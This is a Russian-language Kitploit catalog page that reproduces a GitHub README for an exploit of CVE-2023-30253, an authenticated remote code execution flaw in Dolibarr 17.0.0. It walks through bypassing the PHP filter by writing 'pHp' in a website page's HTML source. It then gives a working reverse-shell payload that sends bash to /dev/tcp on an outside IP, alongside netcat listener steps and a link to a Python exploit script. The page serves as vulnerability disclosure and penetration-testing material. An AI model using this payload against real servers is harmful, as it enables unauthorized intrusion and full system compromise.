Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
Dolibarr-17.0.0-Exploit-CVE-2023-30253 — В Dolibarr 17.0.0 с включенным плагином CMS Website (ядро) аутентифицированный злоумышленник может получить удаленное выполнение команд с помощью внедрения PHP-кода, обходя ограничения приложения. | Kitploit
Инструменты/GitHubGitHub/dollarboysushil/dolibarr-17.0.0-exploit-cve-2023-30253
Анализ уязвимостейАнализ КодаЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеРазработка Полезной Нагрузки
GitHubdollarboysushil/dolibarr-17.0.0-exploit-cve-2023-30253

Dolibarr-17.0.0-Exploit-CVE-2023-30253

В Dolibarr 17.0.0 с включенным плагином CMS Website (ядро) аутентифицированный злоумышленник может получить удаленное выполнение команд с помощью внедрения PHP-кода, обходя ограничения приложения.

Репозиторий
9312 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

Readme.md

CVE-2023-30253

CVE-2023-30253 — это уязвимость безопасности в программном обеспечении Dolibarr, которая позволяет аутентифицированным пользователям выполнять удаленный код с помощью техники манипуляции заглавными буквами во вводимых данных.

Воздействие

Эта уязвимость может привести к несанкционированному удаленному выполнению кода злоумышленниками, что представляет серьезную угрозу безопасности и целостности затронутых систем. Уязвимость исправлена в Dolibarr 17.0.1.

Ссылки

https://www.swascan.com/security-advisory-dolibarr-17-0-0/

https://github.com/Dolibarr/dolibarr


Доказательство концепции

Следующий PoC показывает, как получить обратную оболочку вручную.

Untitled.png

После входа в систему в качестве тестового пользователя мы можем создавать/изменять веб-сайт.

Untitled (1).png

Сначала создайте веб-сайт, а затем создайте страницу.

Untitled (2).png

Untitled

После создания веб-сайта и страницы нажмите на значок бинокля, это откроет созданную страницу в новой вкладке.

Теперь нажмите «Редактировать исходный код HTML».

Untitled (4).png

Здесь мы можем попробовать добавить PHP-код, но есть какой-то фильтр, не позволяющий написать PHP-код. Это можно легко обойти, изменив формат слова php.

Untitled (5).png

После изменения формата слова php на pHp мы видим, что он успешно сохранен.

Untitled (6).png

Перейдя на страницу, мы видим, что наш вставленный PHP-код работает.

Теперь, чтобы получить обратную оболочку, давайте настроим прослушиватель netcat

Untitled (7).png

Untitled (8).png

Затем добавьте наш код обратной оболочки <?pHp exec("/bin/bash -c 'bash -i > /dev/tcp/10.10.14.101/1010 0>&1'"); ?>

Теперь, открыв веб-сайт, мы получаем обратную оболочку

Untitled (9).png




Мы можем использовать код на Python, чтобы упростить задачу

Untitled

Настройте прослушиватель netcat.

Untitled

Запустите скрипт, и мы должны получить обратную оболочку.

Untitled

Автор скрипта: https://github.com/nikn0laty/Exploit-for-Dolibarr-17.0.0-CVE-2023-30253

Скачать инструмент